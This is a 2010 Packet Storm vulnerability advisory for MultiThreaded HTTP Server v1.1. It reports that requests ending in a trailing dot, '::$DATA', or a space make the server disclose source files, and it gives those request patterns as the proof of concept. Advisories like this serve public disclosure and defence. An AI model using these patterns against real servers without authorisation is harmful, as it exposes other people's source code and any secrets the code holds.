MultiThreaded HTTP Server 1.1 Source Disclosure

2010-04-20T00:00:00
ID PACKETSTORM:88715
Type packetstorm
Reporter Dr_IDE
Modified 2010-04-20T00:00:00

Description

                                        
                                            `################################################################  
#  
# Exploit Title: MultiThreaded HTTP Server v1.1 Source Disclosure  
# Found By: Dr_IDE  
# Date: Apr. 20, 2010  
# Download: http://voxel.dl.sourceforge.net/project/http/version1.1/%5BUnnamed%20release%5D/HTTPProject_fat.jar  
# Tested on: Windows 7  
#  
################################################################  
  
- Description -  
  
MultiThreaded HTTP Server v1.1 is a Java based HTTP server. This is the latest  
version of the application available.  
  
MultiThreaded HTTP Server is vulnerable to remote source disclosure attacks.  
  
- Technical Details -  
http://[ webserver IP][:port]/[ file ][.]  
http://[ webserver IP][:port]/[ file ][::$DATA]  
http://[ webserver IP][:port]/[space] (Weird, only works for default index page)  
  
#[pocoftheday.blogspot.com]  
  
`